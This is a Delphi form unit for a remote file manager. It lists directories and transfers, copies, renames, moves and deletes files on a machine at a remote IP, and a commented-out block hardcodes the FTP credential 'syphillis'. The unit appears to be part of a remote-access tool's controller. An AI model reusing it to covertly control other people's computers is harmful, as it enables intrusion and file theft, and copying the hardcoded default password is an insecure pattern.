unit Client12;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  ComCtrls, Menus, ImgList, StdCtrls, ExtCtrls, PicClip;

type
  TForm12 = class(TForm)
    MainMenu1: TMainMenu;
    View1: TMenuItem;
    Refresh1: TMenuItem;
    N1: TMenuItem;
    Exit1: TMenuItem;
    StatusBar1: TStatusBar;
    ListView1: TListView;
    ChangeDirectory1: TMenuItem;
    PopupMenu1: TPopupMenu;
    Download1: TMenuItem;
    SaveDialog1: TSaveDialog;
    Upload1: TMenuItem;
    OpenDialog1: TOpenDialog;
    DriveList1: TMenuItem;
    N2: TMenuItem;
    Copy1: TMenuItem;
    Rename1: TMenuItem;
    Move1: TMenuItem;
    N3: TMenuItem;
    CreateDirectory1: TMenuItem;
    DeleteDirectory1: TMenuItem;
    Delete1: TMenuItem;
    procedure Exit1Click(Sender: TObject);
    procedure ChangeDirectory1Click(Sender: TObject);
    procedure SetDirectory;
    procedure ListView1DblClick(Sender: TObject);
    procedure Refresh1Click(Sender: TObject);
    procedure ListView1SelectItem(Sender: TObject; Item: TListItem;
      Selected: Boolean);
    procedure Download1Click(Sender: TObject);
    procedure Upload1Click(Sender: TObject);
    procedure DriveList1Click(Sender: TObject);
    procedure Copy1Click(Sender: TObject);
    procedure Rename1Click(Sender: TObject);
    procedure Move1Click(Sender: TObject);
    procedure Delete1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form12: TForm12;
  CurrentDir: String;
  FileCount: integer;
  EntryTypes: array of byte;

implementation

uses Client1, Shared1, Client15, Client22, Client25, Client33, Client34,
  Client9;

{$R *.DFM}

procedure TForm12.SetDirectory;
begin
Form25.Edit1.Text := CurrentDir;
StatuSBar1.SimpleText := 'Wait...';
Form1.Send(['FList', CurrentDir]);
ListView1.Items.BeginUpdate;
ListView1.Items.Clear;
ListView1.Items.EndUpdate;
end;

procedure TForm12.Exit1Click(Sender: TObject);
begin
Close;
end;

procedure TForm12.ChangeDirectory1Click(Sender: TObject);
begin

if InputQuery('Change Directory', 'New directory:', CurrentDir) then
SetDirectory;

end;

procedure TForm12.ListView1DblClick(Sender: TObject);
begin

if ListView1.Selected <> nil then
begin

if EntryTypes[ListView1.Selected.Index] = 1 {parent dir} then
begin
CurrentDir := UpOneLevel(CurrentDir);
SetDirectory;
end else
if EntryTypes[ListView1.Selected.Index] = 2 {dir} then
begin
CurrentDir := CurrentDir + ListView1.Selected.Caption;
SetDirectory;
end;

end;

end;

procedure TForm12.Refresh1Click(Sender: TObject);
begin
SetDirectory;
end;

procedure TForm12.ListView1SelectItem(Sender: TObject; Item: TListItem;
  Selected: Boolean);
begin

if ListView1.Selected <> nil then
begin

if EntryTypes[ListView1.Selected.Index] = 1 then
StatusBar1.SimpleText := UpOneLevel(CurrentDir)
else
if EntryTypes[ListView1.Selected.Index] = 2 then
StatusBar1.SimpleText := CurrentDir + ListView1.Selected.Caption + '\'
else
StatusBar1.SimpleText := CurrentDir + ListView1.Selected.Caption;

end else
if StatusBar1.SimpleText <> 'Wait...' then
StatusBar1.SimpleText := CurrentDir;

end;

procedure TForm12.Download1Click(Sender: TObject);
begin

if ListView1.Selected <> nil then
if EntryTypes[ListView1.Selected.Index] = 3 then
begin
SaveDialog1.FileName := ListView1.Selected.Caption;
SaveDialog1.Filter := GetFileNickname(ListView1.Selected.Caption);

if SaveDialog1.Execute then
begin

with TForm15.Create(Application) do
begin

Gauge1.BackColor := Form1.TreeView1.Color;
Gauge1.ForeColor := Form1.TreeView1.Font.Color;

WSocket1.Port := Form9.FTPClient1.Port;
WSocket1.Addr := RemoteIP;

if CurrentDir[Length(CurrentDir)] = '\' then
FileName := CurrentDir + ListView1.Selected.Caption else
FileName := CurrentDir + '\' + ListView1.Selected.Caption;

Label6.Caption := ListView1.Selected.Caption;
Show;

Label7.Caption := 'Connecting...';

TransferFile := TFileStream.Create(SaveDialog1.FileName, fmCreate);
WSocket1.Connect;

end;

end;

end;

end;

procedure TForm12.Upload1Click(Sender: TObject);
begin

OpenDialog1.FileName := '';

if OpenDialog1.Execute then
begin

with TForm15.Create(Application) do
begin
{
Gauge1.BackColor := Form1.TreeView1.Color;
Gauge1.ForeColor := Form1.TreeView1.Font.Color;

if ServerPwd = '' then
FTPClient1.PassWord := 'syphillis' else
FTPClient1.PassWord := ServerPwd;

FTPClient1.Port := Form9.FTPClient1.Port;
FTPClient1.UserName := 'syphillis';
FTPClient1.LocalFileName := OpenDialog1.FileName;
FTPClient1.HostName := RemoteIP;
FTPClient1.HostDirName := CurrentDir;
FTPClient1.HostFileName := ExtractFileName(OpenDialog1.FileName);
Label6.Caption := ExtractFileName(OpenDialog1.FileName);
Show;

Label7.Caption := 'Connecting...';

if FTPClient1.Connect then
begin

Label7.Caption := 'Wait...';
FTPClient1.Cwd;

Gauge1.MaxValue := GetFileSize(OpenDialog1.Filename);
Gauge1.Progress := 0;

Label7.Caption := 'Uploading...';
if FTPClient1.Put then
Close else Label7.Caption := 'Upload failed - ' + FTPClient1.ErrorMessage;

end
else Label7.Caption := 'Failed: Couldn''t connect.';

}

end;

end;



end;

procedure TForm12.DriveList1Click(Sender: TObject);
begin
Form22.Show;
Form22.Refresh1.Click;
end;

procedure TForm12.Copy1Click(Sender: TObject);
begin

if ListView1.Selected <> nil then
begin
Form33.Edit1.Text := CurrentDir + ListView1.Selected.Caption;
Form33.Edit2.Text := CurrentDir + ListView1.Selected.Caption;
Form33.Caption := 'Copy File';
Form33.Label1.Caption := 'Copy:';
Form33.Label2.Caption := 'To:';
Form33.Label3.Caption := '';
Enabled := false;
Form33.Show;
end;

end;

procedure TForm12.Rename1Click(Sender: TObject);
begin

if ListView1.Selected <> nil then
begin
Form33.Edit1.Text := CurrentDir + ListView1.Selected.Caption;
Form33.Edit2.Text := CurrentDir + ListView1.Selected.Caption;
Form33.Caption := 'Rename File';
Form33.Label1.Caption := 'Rename:';
Form33.Label2.Caption := 'To:';
Form33.Label3.Caption := '';
Enabled := false;
Form33.Show;
end;

end;

procedure TForm12.Move1Click(Sender: TObject);
begin

if ListView1.Selected <> nil then
begin
Form33.Edit1.Text := CurrentDir + ListView1.Selected.Caption;
Form33.Edit2.Text := CurrentDir + ListView1.Selected.Caption;
Form33.Caption := 'Move File';
Form33.Label1.Caption := 'Move:';
Form33.Label2.Caption := 'To:';
Form33.Label3.Caption := '';
Enabled := false;
Form33.Show;
end;

end;

procedure TForm12.Delete1Click(Sender: TObject);
begin

if ListView1.Selected <> nil then
begin
Form34.Edit1.Text := CurrentDir + ListView1.Selected.Caption;
Form34.Caption := 'Delete File';
Form34.Label1.Caption := 'File:';
Form34.Label3.Caption := '';
Enabled := false;
Form34.Show;
end;

end;

end.
